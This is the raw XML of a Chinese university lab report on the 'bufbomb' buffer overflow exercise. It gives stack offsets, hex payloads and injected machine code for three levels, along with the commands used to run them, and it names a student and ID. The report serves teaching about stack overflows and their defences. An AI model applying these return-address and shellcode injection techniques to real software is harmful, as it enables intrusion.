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0B2545"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>深圳大学实验报告：缓冲区溢出攻击实验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>报告人：姚泽棉    学号：2024150026    课程：计算机系统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4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid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shd w:fill="E8EEF5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课程名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>计算机系统(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>实验项目名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>实验四：缓冲区溢出攻击实验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>学院/专业</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>计算机与软件学院 / 计算机科学与技术</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>报告人</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>姚泽棉</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>学号/班级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>2024150026 / 高性能班</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>实验时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>2026年5月14日 - 2026年6月04日</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>一、实验目标</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>理解程序函数调用中参数传递机制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>掌握缓冲区溢出攻击方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>进一步熟练掌握 GDB 调试工具和 objdump 反汇编工具。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>二、实验环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Linux 32 位兼容运行环境。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>目标程序：bufbomb。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>辅助工具：makecookie、sendstring、objdump、gdb。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>队伍名按学号 2024150026 记录，cookie 为 0x5bae09c3。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>三、实验原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>bufbomb 中的 getbuf() 函数调用 Gets(buf) 读取输入。Gets 不检查输入长度，当输入超过局部数组空间时，会继续覆盖当前函数栈帧中的保存寄存器和返回地址。通过构造特定字节序列，可以让 getbuf 返回时跳转到指定函数，并在栈上伪造函数参数。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int getbuf()</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    char buf[12];</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Gets(buf);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return 1;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在 32 位 x86 小端机器上，地址 0x08048eb0 写入输入文件时应按 b0 8e 04 08 的顺序排列。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>四、关键反汇编分析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4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid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shd w:fill="E8EEF5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getbuf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0x08048ad0；buf 首地址为 ebp-0x18。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>返回地址位置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ebp+0x04。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>覆盖偏移</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0x04 - (-0x18) = 0x1c = 28 字节。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>smoke</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0x08048eb0。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>fizz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0x08048e60。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>bang</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0x08048e10。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>global_value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0x0804a1c4。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>因此三个关卡的共同基础是先写入 28 字节填充内容，使接下来的 4 字节正好覆盖 getbuf 的返回地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>五、实验步骤与结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. 第一关：返回到 smoke()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本关只需要把 getbuf 的返回地址改为 smoke 函数地址。构造格式如下：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28字节填充 + smoke地址小端序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exploit_smoke.txt：</w:t>
        <w:br/>
        <w:t>00112233445566778899001122334455667788990011223344556677b08e0408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cat exploit_smoke.txt | ./sendstring | ./bufbomb -t 2024150026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>实验结果：程序进入 smoke()，输出 Smoke!: You called smoke()，说明第一关攻击成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. 第二关：返回到 fizz() 并传入 cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>fizz 需要一个参数。函数进入 fizz 后按照 [ebp+8] 读取第一个参数，因此在覆盖返回地址之后，还要放置 4 字节伪返回地址和 4 字节 cookie。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payload布局：28字节填充 + fizz地址 + 伪返回地址 + cookie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exploit_fizz.txt：</w:t>
        <w:br/>
        <w:t>00112233445566778899001122334455667788990011223344556677608e040800000000c309ae5b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cat exploit_fizz.txt | ./sendstring | ./bufbomb -t 2024150026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>实验结果：程序进入 fizz()，读取到的参数等于 cookie，第二关攻击成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. 第三关：修改 global_value 后返回到 bang()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>第三关要求在进入 bang 前先修改全局变量 global_value。解决方法是在输入中放入一段机器码，使程序先执行注入代码，再跳转到 bang。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汇编逻辑：</w:t>
        <w:br/>
        <w:t>movl $0x5bae09c3, 0x0804a1c4</w:t>
        <w:br/>
        <w:t>push $0x08048e10</w:t>
        <w:br/>
        <w:t>ret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机器码：</w:t>
        <w:br/>
        <w:t>c705c4a10408c309ae5b68108e0408c3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>注入代码放在 buf 开头，剩余位置用 NOP 填充到 28 字节，再把返回地址覆盖为 buf 的实际首地址。buf 地址通过 gdb 的 print/x $ebp-0x18 获取。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exploit_bang.txt 模板：</w:t>
        <w:br/>
        <w:t>c705c4a10408c309ae5b68108e0408c3909090909090909090909090&lt;buf首地址小端表示&gt;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cat exploit_bang.txt | ./sendstring | ./bufbomb -t 2024150026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>实验结果：程序先执行注入代码，将 global_value 改为 cookie，再进入 bang()，第三关攻击成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>六、问题与处理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4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid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shd w:fill="E8EEF5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32 位程序不能运行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>在 64 位 Linux 中安装 32 位兼容库。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>sendstring 后没有成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>检查 payload 是否为连续十六进制字符，地址是否使用小端序。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>第三关失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>重点检查 buf 地址是否为本次运行取得的地址，以及系统是否开启 ASLR。必要时临时关闭 ASLR 后重试。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>七、实验总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本实验通过三个关卡逐步验证了缓冲区溢出的基本攻击路径：第一关覆盖返回地址实现控制流劫持，第二关在控制流劫持基础上伪造函数参数，第三关进一步注入并执行机器码修改全局变量。实验说明，未进行长度检查的输入函数会破坏栈帧完整性，导致返回地址、局部变量和函数参数均可被攻击者控制。实际开发中应避免使用 gets 等不安全函数，并结合栈保护、地址随机化、不可执行栈等机制降低风险。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>八、教师批阅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9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>指导教师批阅意见：</w:t>
              <w:br/>
              <w:br/>
              <w:br/>
              <w:br/>
              <w:t>成绩评定：</w:t>
              <w:br/>
              <w:br/>
              <w:t>指导教师签字：</w:t>
              <w:br/>
              <w:br/>
              <w:t>日期：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00" w:line="300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